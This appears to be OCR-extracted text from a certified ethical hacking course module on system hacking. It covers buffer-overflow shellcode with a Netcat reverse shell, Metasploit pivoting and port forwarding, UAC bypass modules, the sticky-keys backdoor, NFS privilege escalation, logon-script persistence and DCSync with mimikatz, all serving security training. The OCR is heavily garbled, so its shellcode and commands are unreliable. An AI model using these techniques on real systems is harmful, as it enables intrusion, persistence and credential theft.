\x¢7\x61\x16\x75\Xe7\x27\ xf 9\x92\ x5 f\xb8\ x24) \x94\xd4\ x4 F\xd9\ x5b\x1d\4 10\xb3\x9b\xf2\xae” \\xdb\x40\x60\x35\x1b\ x0e\x Bf\xfb\x18\x75\xde \\x55\x3e\x84\xBe\x9e\ xfa\ xf] stam 1\xcf\x6\x13\xef” "\xd0\x02\x47\xbf\x86\xdc\x! b\xd3\x2e\x79\x7b" \xa5\x1c\xba\xfd\xaa\ x48\ x4c\ xe1\x1b\x25\x09\ x1e\ x93\ xal\x9d" *\x67\\xc9\ x51\x01\xb2\x49\x71\ x80\ x16) xa4\x1a\x1d\xf3\x05\x47" \xSe\x2e\x49\x7e\ x1d\ xda\ x32\x85\x3d \xaf\x37\xcl\xf9\x5c\xda "\x5a\x6c\x62\xf9\x5b\xa5’

Figure 6.73: Screenshot showing the output of msfvenom

Now, run the following Python script to inject the generated shellcode into the EIP register and gain shell access to the target vulnerable server:

Figure 6.74: Screenshot of Python script for overwriting EIP

Module 06 Page 684

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Before running the above script, run the following Netcat command to listen on port 4444: ne

-nvlp

4444

Search

$sudo

[sudo]

T

2r@par su

password @parrot #cd

attacker:

for

@parrot

-nvlp 4444 on [any] 4444

#nc listening

Figure 6.75: Screenshot of Netcat Next, run the above Python script to gain shell access to the target vulnerable server:

@parrot d

parrot

nvlp 4444

listening on [any] 4444 connect to [10.10.1.13]

Microsoft (c)

IE:

Windows

Microsoft

from

[Version

Corporation.

\CEH-Tools\CEHv12

iwhoami

(UNKNOWN)

[10.10.1.11]

10.0.22000.469]

All

rights

50825

reserved

Module

06

System

Hacking\Buffer

Overflow

Tools\vulnserver>whoami

Module

06 System

Hacking\Buffer

Overflow

Tools\vulnserver>{]

indows11\admin

IE:

\CEH-Tools\CEHv12

Figure 6.76: Screenshot showing remote access to Admin account

Module 06 Page 685

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Return-Oriented Programming (ROP) Attack T]_

Return-oriented programming (ROP) is an exploitation technique used by attackers to execute arbitrary malicious code An attacker hijacks the target program control flow

a access to the call stack and then executes by gaining By " " " arbitrary machine instructions by reusing available

MOV

XO, gadgetA.

libraries known as gadgets

mf

Gadgets are a collection of instructions that end with

libFunca ()

the x86 RET instruction

¥

Code maliciousfunc () a2 Push addr_gadgetc —gadgetct) Push addr_gadgetB()

The attacker selects a chain of existing gadgets to create a new program and executes it with malicious intentions ROP attacks are very effective as they utilize available and legal code libraries, which are not identified by

security protections such as code signing and

Library

a Call gadget A

Pop LR

RET

PowerUp.ps

-> PowerUp

Windows [Version 10.0.22000.469] osoft Corporation. All rights reserved

rs\Admin\DownLoads

ExecutionPolicy Byp

xecutionPolic

Command ".

\PowerUp

.\PowerUp.ps1;Invoke-AllChecks

AbuseFunction Modifiable Modifiable Modifiable Modifiable Modifiable Modifiable Modifiable Modifiable =PATH®s .dLL

‘al Group

Servi Service Service Service Service Service Service Service Hijacks

with

Files Fi Fi Files

oke-WScriptUACBy;

s s s

Command

a iceBi Name 'edgeupc stall-ServiceBinary -Name ‘edgeupdate all-ServiceBinary -Name 'edgeupda Instal iceBinary -Name 'edgeupda Install-ServiceBinary -Name 'gupdate Install-ServiceBinary -Name ‘gupdate Install-ServiceBinary -Name 'gupdatem Install-ServiceBinary -Name 'gupdatem Write-HijackDLL -DLUPath ‘C:\Users\Ad

Figure 6.101: Screenshot of Metasploit showing execution of PowerSploit to detect unquoted service paths =

Service Object Permissions

A misconfigured service permission may allow an attacker to modify or reconfigure the attributes associated with that service. This may even lead to changing the location of the application binary to a malicious executable created by the attacker. By exploiting such services, attackers can even add new users to the local administrator group in the system. Attackers then hijack the new account to elevate their access privileges.

jobe\ARM\1.0\arm AdobeARMservice

eNetworkRestri buseFu

erviceName Path StartName AbuseFunct ion

Figure 6.102: Screenshot of Metasploit showing execution of PowerSploit to detect misconfigured service permissions Module 06 Page 723

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking =

Exam 312-50 Certified Ethical Hacker

Unattended Installs Unattended installs allow attackers to deploy Windows OSs without the intervention of an administrator. Administrators need to manually clean up the unattended install details stored in the Unattend.xml file. This XML file stores all the information related to the configuration settings set during the installation process and may also include sensitive information such as the configuration of local accounts, usernames, and even decoded passwords. In Windows systems, the Unattend.xml file is stored in one of the following locations: C:\Windows

\Panther\

C:\Windows \Panther\

UnattendGC\

C: \Windows\System32\ Cc: \Windows\System32\sysprep\

If attackers can gain access to this file, then they can easily obtain credential information and configuration settings used during the installation of that service or application. Attackers use this information to escalate privileges.

[*]

Checking

UnattendPath

for

unattended

install

files...

:

\Windows\Panther\Unattend.

xml

Figure 6.103: Screenshot of Metasploit showing execution of PowerSploit to detect unattended installs

Module 06 Page 724

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Pivoting and Relaying to Hack External Machines

CE H

|@ Attackers use the pivoting technique to compromise a system, gain remote shell access on it, and further bypass the firewallto pivot via the compromised system to access other vulnerable systems in the network @

Attackers use the relaying technique to access resources present on other systems via the compromised system such

a way that the requests to access the resources are coming from the initially compromised system

Pivoting

oe

Relaying 7

Client2

right © by

Pivoting and Relaying to Hack External Machines (Cont’d) @

Discover live hosts in the network

Pivoting

©

@ @©

CE H

Set up routing rules

Exploit vulnerable services

scan ports of live systems

Al Rights Reserved. Reproduction i tricty Prohibited.

Module 06 Page 725

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Pivoting and Relaying to Hack External Machines (Cont’d)

CE H

Relaying

1. Set up port forwarding rules

|

@ Attackers can browse the http server running on the target

system using the following URL:

2. Access the system resources

http://localhost:

10080

a Attackers can access the SSH server running on the target system by executing the following command: # ssh myadmin@localhost Copyright © by

Al Rights Reserved Reproduction i

Pivoting and Relaying to Hack External Machines Pivoting and relaying are the techniques used to find detailed information about the target network. These techniques are performed after successfully compromising a target system. The compromised system is used to penetrate the target network to access other systems and resources that are otherwise inaccessible from the attacking network. In the pivoting technique, only the systems accessible through the compromised systems are exploited, whereas in the relaying technique, the resources accessible through the compromised system are explored or accessed. Using pivoting, attackers can open a remote shell on the target system tunneled through the initial shell on the compromised system. In relaying, resources present on the other systems are accessed through a tunneled shell session on the compromised system.

Module 06 Page 726

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

The following diagrams illustrate the pivoting and relaying techniques:

Client 2

Using port

forwarding

rules to access

: the system

Client 2

Figure 6.105: Illustration of relaying

Detailed explanation of the pivoting and relaying techniques is as follows: =

Pivoting

In this technique, the first objective of an attacker is to compromise a system to gain a remote shell on it, and further bypass the firewall to pivot through the compromised system and gain access to the other vulnerable systems in the network. Once the system is successfully compromised, a Meterpreter session is established. As the session is pivoted through the compromised system, the target system cannot determine the actual origin of the exploitation.

Module 06 Page 727

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Steps to perform pivoting:

1.

Discover live hosts in the network Once a system is compromised, an ARP scan is performed to discover the list of live systems in the network. For example, an attacker uses the following command target network: >

run

post/windows/gather/arp_scanner

RHOSTS

to detect live hosts in the

Figure 6.106: Screenshot of Metasploit showing results of arp_scanner As shown in the screenshot, the scan results show seven IP addresses reachable from the compromised system. To find out more information about these IP addresses, attackers perform port scanning.

2.

Set up routing rules Prior to using Metasploit to run a port scanner against two IP addresses in the target network, attackers implement routing rules to instruct Metasploit to route all the traffic destined to the private network using the existing Meterpreter session established between the attacker’s system and the compromised system.

For example, an attacker can use the following commands to perform this step: >

background

>

route

add





Routing rule to instruct Metasploit to route any traffic destined to 10.10.10.0 255.255.255.0 to session number 1 (Meterpreter session established with a compromised system)

Module 06 Page 728

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Figure 6.107: Screenshot of Metasploit setting up routing rule 3.

Scan ports of live systems Once the routing rule is implemented,

systems.

port scanning is performed

against the live

For example, the attacker uses the following commands to perform port scanning on the target systems: >

use

auxiliary/scanner/portscan/tcp

>

set

RHOSTS

>

set

PORTS

>

run

As shown

systems.

1-1000

in the

screenshot,

the

result displays

the

open

ports

on the

private

Figure 6.108: Screenshot of Metasploit showing results of port scan 4.

Exploit vulnerable services After the ports are scanned, the vulnerable services running on those ports can be exploited. For example, an attacker Control (UAC) setting.

can

use

BypassUAC

exploit to

bypass

the

User

Access

As shown in the screenshot, a successful session is established to the vulnerable system by pivoting through a compromised system.

Module 06 Page 729

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

exploit (

>

ILHOST => 10.10.1.13 imsf6 exploit (

> set

TARGET Imsf6 exploit( [!]

[!]

set LHOST 10.10.1.13 0

) > [exploit

SESSION

may

r

be

compatible

* missing Meterpreter featur TCP handler on

with

this

module

stdapi_sys proc 10.10.1.13:4444

Default an bypass this setting, continuing guring payload and stager registry keys cuting payload: C:\Windows\s e\cmd.exe

Cleaining

up

/c C:\Windows\System32\ fodhelper. exe

istry

Sending stage (175174 bytes) to 16.10.1.11

(10.10.1.13:4444

M sen)

Bee

meterpreter

TARGET

-> 10.10,1.11:50278)

at

2-84-85 03:59:05

-0400

> J

Figure 6.109: Accessing the target system =

Relaying If the pivoting technique is unsuccessful, attackers use the relaying technique to exploit a vulnerable system in the target network. Attackers use relaying to access resources present on other systems in the target network via the compromised system in such a way that the requests to access the resources come from the initially compromised

system.

Steps to perform relaying: 1.

Set up port forwarding rules The main purpose of port forwarding is to allow a user to reach a specific port ona system that is not present on the same network. The initially compromised system is responsible for allowing direct access to the system, which is otherwise inaccessible from the attacking system. Using a Meterpreter session, a listener can be created using a port number from a list of open ports on the localhost, which links that listener to a port on a remote server. This linking of ports is known as port forwarding. For example, here, the attacker chose port numbers 80, 22, and 445 to set up port forwarding rules. eterpreter

>|portfwd

add

-l

eterpreter

>|portfwd

add

-l

Local TCP}relay created: eterpreter >|portfwd add -l Local TCP|relay created: Local

eterpreter

TCPI

>

relay

created:

10080

-p 80

100445

-p

-r

10.16.1.19

:10080 10.10.1.19:80 10022 -p 22 -r 10.10.1.19 :10022 10.160.1.19:22 :100445

445

-r

10.10.1.19

10.10.1.19:445

Figure 6.110: Applying port forwarding rules Module 06 Page 730

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

2.

Exam 312-50 Certified Ethical Hacker

Access the system resources Once port forwarding has been successful, an attacker can use an appropriate client

program to access the remote resources present on the target system. For example: Attackers can browse following URL:

an

HTTP

server running on the target system

by using the

http: //localhost:10080

Attackers can access an SSH server running on the target system following command: #

Module 06 Page 731

ssh

by executing the

myadmin@localhost

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Privilege Escalation Using Misconfigured NFS @

CE H

Attackers often attemptto enumeratea misconfigured Network File System (NFS) to exploit and gain root-level access to a remote server

|@ Amisconfigured NFS paves the way for attackers to gain root-level access through a regular user account or low-privileged user @

By exploiting NFS vulnerabilities, attackers can sniff sensitive data and files passingthrough the intranet and launch further attacks Check Whether the NFS Service is Running on the Target Host

Establish a Remote Connection with the Target Host Using SSH

Privilege Escalation Using Misconfigured NFS Attackers often attempt to enumerate misconfigurations in the Network File System (NFS) to exploit and gain root-level access to a remote server. NFS is a protocol used to share and access data and files over a secured intranet. It uses port 2049 to provide communication between a client and server through the Remote Procedure Call (RPC). A misconfigured NFS paves the way for attackers to gain root-level access through a regular user account or low-privilege user. By exploiting NFS vulnerabilities, attackers can sniff sensitive data and files passing through the intranet and launch further attacks.

Users accessing files using RPC calls

Users accessing files using RPC calls

Network File System

Attacker Attacker

targets regular users to attain root level

access

Figure 6.111:

Module 06 Page 732

Illustration of NFS exploitation

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Steps Involved in Gaining Root Access of the Target Host: =

Step 1: Run the following nmap command to check whether the NFS service is running on the target host. nmap

-sV

Figure 6.112: Screenshot showing the output of nmap

=

Step 2: Use the following command service: sudo

=

apt-get

install

to install NFS and

interact with the target NFS

nfs-common

Step 3: Run the following command to check if any share is available for mounting on the target host: showmount

-e

Figure 6.113: Screenshot showing the output of showmount

=

Step 4: If the above command returns any mountable named nfs by using the following command: mkdir

=

directories, create a directory

/tmp/nfs

Step 5: Run the following command to mount the nfs directory on the target host. sudo

Module 06 Page 733

mount

-t

nfs

:/

/tmp/nfs

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking =

Step 6: Execute the following commands to view the details of the mounted and obtain the group ownership to the share directory. cd

1s

cp

/bin/bash

.

-la

Step 7: Run the following command host using SSH: ssh

directory

/tmp/nfs

sudo

=

Exam 312-50 Certified Ethical Hacker

-1

to establish a remote connection with the target

Figure 6.114: Screenshot showing the output of showmount

Module 06 Page 734

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Privilege Escalation Using Windows Sticky Keys

CE H

|@ In Windows,the sticky keys feature allows users to use a combination of keys including Ctrl, Alt, and Shift instead of pressing three keys ata time @ After gaining access to a remote system, attackers escalate privileges by simply altering the file associated with the sticky keys feature and pressing the Shift key five times in rapid succession once the system has been booted © Do you want to turn on Sticky Keys? Sticky Kes lets you use the SHIFT, CTRL, ALT, or Windows Logo keys by pesting te tum on Sticky Key isto pres the SHIFT tone key at time, The keybosrd short key Stimes. Dicablethiskeyboard shortcutin Ear of Access keyboard settings

$s Reserved. Reproduction

Privilege Escalation Using Windows Sticky Keys In Windows, the sticky keys feature allows users to use a combination of keys including Ctrl, Alt, and Shift instead of pressing three keys simultaneously. Attackers exploit this feature to perform privilege escalation. After gaining access to a remote system, attackers escalate privileges by simply altering the file associated with the sticky keys feature and pressing the Shift key 5 times in fast succession once the system has been booted. To perform this attack, an attacker must copy the file sethc.exe at the location %systemroot%\system32 to a different location. Next, they must copy cmd.exe to the same location. Now, when the attacker restarts the system and hits the Shift key 5 times, a Command Prompt window opens with system-level access. Further, the attacker can retain backdoor access by simply creating a new local administrator account. ©

Do you want to turn on Sticky Keys? Sticky Keys lets you use the SHIFT, CTRL, ALT, or Windows Logo keys by pressing one key at a time. The keyboard shortcut to turn on Sticky Keys is to press the SHIFT key 5times. Disable this keyboard shortcut in Ease of Access keyboard settings

Yes

No

Figure 6.115: Screenshot of the Windows sticky keys feature

Module 06 Page 735

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

we, A

QR)

Martin

AD

stieta

Figure 6.116: Screenshot showing system-level access in Command Prompt achieved using sticky keys

Module 06 Page 736

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Privilege Escalation by Bypassing User Account Control(UAC)

(CEH

“& When attackers fail to escalate privileges using a simple payload, they attempt to evade Windows security

features such as UAC and to

@

Ina Windows environment, even if the

is set to any option, attackers can abuse a few

Windows applications to escalate privileges without triggering a UAC notification

Techniques to Bypass UAC Using Metasploit Bypassing UAC Protection

Bypassing UAC Protection via Memory Injection

Privilege Escalation by Bypassing User Account Control (UAC) (Cont'd)

Bypassing UAC Protection Through FodHelper Registry Key

C'EH com | se ae

Bypassing UAC ProtectionThrough Eventvws Registry Key

{eremoeerr rarer ary ay

Bypassing UAC Protection via Memory Injection

Privilege Escalation by Bypassing User Account Control (UAC) When attackers fail to escalate privileges using a simple payload, they attempt to evade Windows security features such as UAC and to gain system-level access. To achieve this, attackers first lure the victim into accepting and running a specific file crafted by them. In a Windows environment, even if the UAC protection level is set to any option, attackers can abuse a few Windows applications to escalate privileges without triggering a UAC notification.

Module 06 Page 737

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

System Hacking

Alternatively, attackers may inject malware into a trusted process to gain high-level privileges without any notification to the user. Techniques to Bypass UAC Using Metasploit =

Bypassing UAC Protection

Attackers use the bypassuac Metasploit exploit to bypass UAC security through process injection. It generates another session or shell without a UAC flag. After gaining shell access, attackers execute the getsystem and getuid commands to retrieve the privileges of system authority . msf

>

Windows

use

exploit/windows/local/bypassuac

x86

Imsf6 exploit( LHOST => 10.10.1.13 nsf6 exploit ( ARGET => 0 exploit (

) > set LHOST 10.10.1.13 ) > set TARGET 0

not be compatible with this module * missing Meterpreter features: stdapi_sys proce arted rev TCP handler on 10.10,1.13:4444 UAC is Enab checking le\ rators group! Continuing UAC

can

‘aining up reg tage

bypas

this setting,

and stager 7

continuing

registry

keys

snative\cmd.exe

) to

10.10.1.11

(10.10.1.13:4444

Windows

\System32\ fodhelper. exe

-> 10.10.1.11:50278)

at 2022-04-05 03

5

-0400

Figure 6.117: Screenshot of Metasploit showing UAC protection bypass

Module 06 Page 738

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking =

Exam 312-50 Certified Ethical Hacker

Bypassing UAC Protection via Memory Injection

The Metasploit exploit bypassuac_injection employs reflective DLL mechanisms to inject only DLL payload binaries. Using this command, attackers can obtain AUTHORITY \SYSTEM privileges. msf

>

use

exploit/windows/local/bypassuac_injection

Backgrounding exploit ( Matching Modules # Name ription

exploit/windows/local/BBBSSMEM windows store UAC Protection B Via Windows St exploit/windows/local/BSESSMEM windows store @ UAC Protection Bypass Via Windows exploit/windows/local /ijieSSUE alate UAC Protection By exploit/windows/local/(MESEmEe alate UAC Protection ploit/windor

filesys 2019-0 set .exe) reg 2019-02-19 set.exe) and Registry 2010-12-31

injection

By

ory

Injectio SxS

manual

Wind)

manual

s 7

Hind

2010-12-31

nd|

2017-04-06

ind|

alate UAC Protection Bypass el abusing WinSXS exploit/windows/local/SBESSUEE_ vbs 2015-0: alate UAC Protection Bypass (ScriptHost Vulnerability)

exploit/wine

ocal/BMBEssueE

comhijack

alate UAC Protection Bypass (Via C exploit/windows/local /@MESSEEE eventvwr

Wind)

Wind!

1900-01-01

Wind

2016-08-15

Ss

Wind)

exploit/windows/local/§SSBUEe sdclt 2017-03-17 alate UAC Protection Bypass (Via Shell Open Registry Key) exploit/windows/local/SJBESSMEE silentcleanup 2019-02-24

s

Wind

alate

alate

UAC

UAC

Pro’

Protection

n

(Via Eventwwr

Bypass

1

Registry

Key)

eanup)

Wind!

Figure 6.118: Screenshot of Metasploit showing UAC Bypass via memory injection

Module 06 Page 739

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking =

Exam 312-50 Certified Ethical Hacker

Bypassing UAC Protection through FodHelper Registry Key The Metasploit exploit bypassuac_fodhelper hijacks a special key from the HKCU registry hive to bypass the UAC and attaches it to a fodhelper.exe. The custom commands can be invoked when the fodhelper.exe file is executed. msf

>

use

exploit/windows/local/bypassuac_fodhelper

Terminal

>Luse_exploit/windo

ulting to

L/bypassu

windc

erpreter )

exploit (

helper

>[set

session

) >[show

tcp

]

options

Module options (exploit/windows/local/bypassuac_fodhelper) Name

Current Setting

Required

Description

SESSION

1

yes

The

Payload

options

(windows/meterpreter/reverse

Name

Current

EXITFUNC

pr

LHOST LPORT

Setting

10.10.1.13 4444

Required

s

ion

to

run

this

module

on

tcp)

Description Exit technique

The The

listen listen

addre port

(Accepted in

,

interface

seh, thread, may

be

pro

specif

none)

Exploit target: Id

Name

®

Windows

Figure 6.119: Screenshot of Metasploit showing UAC Bypass via FodHelper registry key

=

Bypassing UAC Protection through Eventvwr Registry Key The Metasploit exploit bypassuac_eventvwr also hijacks a special key from the HKCU registry, and custom commands can be executed with the launch of Event Viewer. This exploit manipulates the registry key, but it is wiped once the malicious commands or payloads are invoked. msf

>

Module 06 Page 740

use

exploit/windows/local/bypassuac_eventvwr

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

use exploit/windows/local/bypassuac_even ploit (windows/local/bypassuac_eventvwr) > set sion => 1 exploit (windows /local/bypassuac_eventvwr) > exploit started TCP handler on 192.168.1.106:4444 UAC is Enabled, checking level Part

UAC

of Administrato

i

et

to

ntinuing...

Default

By c this continuing. Configuring payload and stager registry keys . Executing payload: C:\Windows\SysWOW64\cmd.exe /c C:\Wind: nding to 192.168.1.105 er Ned] (192.168.1.106:4444 -> 192.168.1.105:65227) g up regi

getsystem

via technique 1 (Named Pipe Impersonation

(In Memory/Admin)).

getuid

Figure 6.120: Screenshot of Metasploit showing UAC bypass via the Eventvwr registry key =

Bypassing UAC Protection through COM Handler

jack

The Metasploit exploit bypassuac_comhijack allows attackers to build COM handler registry entries within the current user hive to bypass UAC protection. These registry entries can be referenced to the execution of some high-level processes, which results in the loading of attacker-controlled DLLs. These DLLs can be injected with a malicious payload that allows attackers to establish elevated sessions. msf

>

use

exploit/windows/local/bypassuac_comhijack

exploit/windows bypassuac_comhijack oit (windows/local/bypassuac_comhijack) > set ee it (windows/local/bypassuac_comhijack) > exploit e TCP handler , checking 1 f Administra S group! Continuing et to Defa UAC can byp h tting, continuing

Targeting Computer Managment

via HKCU\Software

d to ¢

aj\AppData\Local\

integrit

CLSID\ {0A2

bqLjiowg.d1l

> 192.168.1.107:49209)

> get

a technique

E

i

onation

(In

Memory/Admin) )

Figure 6.121: Screenshot of Metasploit showing UAC bypass via COM handler hijacking Module 06 Page 741

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

CEH

Privilege Escalation by Abusing Boot or Logon Initialization Scripts Attackers take advantage of boot or logon initialization scripts for escalating ivileges or maintaining persistence ona

target system

Boot or logon initialization scripts also allow attackers to perform different administrative tasks, using which they can run other programs on the system Logon Scriptip’ gs (Windows)

© Attackers create persistence and escalate privileges on a system by embedding the path to their script in the | following registry key: HKCO\Envi ronment\UserTai tMpriogonscript

Logon Script (Mac) (ac)

© Logon scripts in macOS are also known as login hooks and allow attackers to create persistence on a systemas — | they are executed automatically during system login © Attackers leverage these hooks to inject a malicious payload to elevate privileges and maintain persistence

Network Logon Scripts

RC Scripts Startup Items

© Network logon scripts are allocated using Active Directory or GPOs © Attackers abuse network logon scripts to gain local or administrator credentials based on the access configuration @ Attackers abuse RC scripts by embedding a malicious binary shell or path in RC scripts such as re.common or

| © -etoca1 within Unix-based systems to escalate privileges and maintain persistence @

Attackers create malicious files or folders within the /Library/startupItems

| @ StartupItems items are executed at the bootup stage with root-level privileges

directory to maintain persistence

Privilege Escalation by Abusing Boot or Logon Initialization Scripts Attackers take advantage of boot or logon initialization scripts for escalating privileges or maintaining persistence on a target system. These scripts also allow attackers to perform different administrative tasks, through which they can run other programs on the system. In addition,

attackers

can

communicate

with

an

internal

logging

server

implementing

these

scripts. Such scripts may differ depending on the OS of the target system and the location (remote or local) from which they are executed. Attackers initially use these scripts to hold persistence on a single system. Based on the configuration settings, attackers can escalate privileges either using a local or an admin account. Discussed below are the various techniques initialization scripts for escalating privileges.

used

by

attackers

to

apply

boot

or

logon

Logon Script (Windows) Once a user or a user group is signed into a Windows system, the OS allows the execution of logon scripts. These scripts are used by attackers to create persistence and escalate privileges on a system by embedding the path to their script to the following registry key: o

HKCU\Environment\UserInitMprLogonScript

Logon Script (Mac)

Logon scripts on macOS are also known as login hooks and allow attackers to create persistence on a system as they are executed automatically during the system login. A specific script (login hook) is executed by macOS when a login attempt is made. However, this login hook differs from startup items as the hook itself is executed as the root user. Attackers leverage these hooks to inject malicious payloads to elevate privileges and maintain persistence. Module 06 Page 742

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking =

Exam 312-50 Certified Ethical Hacker

Network Logon Scripts Attackers leverage network logon scripts for escalating privileges and maintaining persistence. These scripts are allocated using AD or GPOs. Such logon scripts are executed using any valid user’s credentials. The initialization of a network logon script can be utilized for different systems based on the networked systems. For this reason, attackers abuse network logon scripts to gain local or administrator credentials based on the access configuration to escalate their privileges.

=

RC Scripts

Attackers abuse RC scripts to escalate privileges and create persistence during the startup process of Unix-based systems. These scripts are executed during system startup and allow the mapping and initializing of custom startup services. These custom services can be used by an attacker for various run levels. Attackers maintain persistence by embedding a malicious binary shell or path to RC scripts such as rc.common or re.local within Unix-based systems. When the system reboots, attackers gain root access through the automatic execution of these RC scripts. =

Startup Items In macOS systems, startup items run at the last stage of the booting process and include different executable files or shell scripts along with their configuration information, which is used to determine the order of execution for the startup items. StartupParameters.plist is an executable file of a startup item, which is located within the top-level root directory. Attackers create malicious files or folders within the /Library/StartupItems directory to maintain persistence. As these items are executed at the bootup stage, they can be executed with root-level privileges.

Module 06 Page 743

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Privilege Escalation by Modifying Domain Policy

CE H

@ The domain policy comprises the configuration settings that may be implemented between the domainsina forest domain environment @ Attackers modify the domain settings by changing the group policy and trust relationship between domains @

Attackers also implanta fake domain controllerto maintain a foothold and escalate privileges

Group Policy Modification

@

a

Modify the scheduledtasks.xm1

file to createa

_ _

malicious scheduled task/job using scripts such as

~

\Machine\Preferences\Scheduled

€=—=9

New-GPOImmediateTask:

Tasks\ScheduledTasks. xml

2

Domain Trust Modification

@ Use the domain trusts

utility to collect

information about trusted domains and modify

_ the settings of existing domain trusts: C: \Windows \system32>nltest

ole

/domain_trusts

_ _

Privilege Escalation by Modifying Domain Policy Attackers often attempt to circumvent security solutions and other defenses implemented in a domain environment by modifying the domain’s configuration settings. In a Windows environment, domains controlled by the AD service manage the communications between various resources such as computers and user accounts in a network. The domain policy comprises the configuration settings that may be implemented between the domains in a forest domain environment. Attackers can modify the domain settings by changing the group policy and trust relationship between domains. Attackers make these changes to implant a fake domain controller (DC), through which they can maintain a foothold and escalate privileges. =

Group Policy Modification

Group policies are used to manage the resources and their configuration settings such as security options, registry keys, and domain members. All user accounts are provided with read access to GPOs by default, and write access is provided only to specific users or groups within the domain. \\SYSVOL\\Policies\

Attackers use the above path to access the domain group policies and modify them to perform unintended activities such as creating a new account, disabling or modifying internal tools, ingress tool transfer, unwanted service executions, and modifying the policy to extract passwords in plaintext. \Machine\ Preferences \ScheduledTasks\ScheduledTasks

. xml

Attackers use the above path to modify the ScheduledTasks.xml file to create a malicious scheduled task/job using scripts such as New-GPOImmediateTask. \MACHINE\Microsoft\Windows

Module 06 Page 744

NT\SecEdit\GptTmpl.inf

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Attackers use the above path to modify particular user rights such as SeEnableDelegationPrivilege to create a backdoor. Then, attackers control the user account to change the group policy settings. =

Domain Trust Modification Domain trust objects provide information such as credentials, accounts, authentication, and authorization mechanisms used by domains. c:\Windows\system32>nltest

/domain_trusts

Attackers use the above utility to collect information about trust domains and use the gathered information to add a domain trust or modify the settings of existing domain trusts to escalate privileges through Kerberoasting and pass-the-ticket attacks.

Module 06 Page 745

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Retrieving Password Hashes of Other Domain Controllers Using DCSync Attack @

Ina DCSyncattack, an attacker initially compromises and obtains privileged account access with domain replication

rights and activates replication protocolsto create a virtual

domain controller (DC) similarto the originalAD ‘@

Itallows an attacker to send requests to the DC, retrieve

@

Attackers leverage mimikatzto perform DCSyncattack

mimikatz

cE H onl

mimikatz includes a DCSync command that | utilizes MS-DRSRto replicate the behavior of a legitimate DC

administrator NTLM password hashes,and perform further attacks such as golden ticket attacks, account manipulation, and living-off-the-land attacks

Domain Controller

(Server)

pright © by

Tttps//othub com Al Rights Reserved Reproduction i

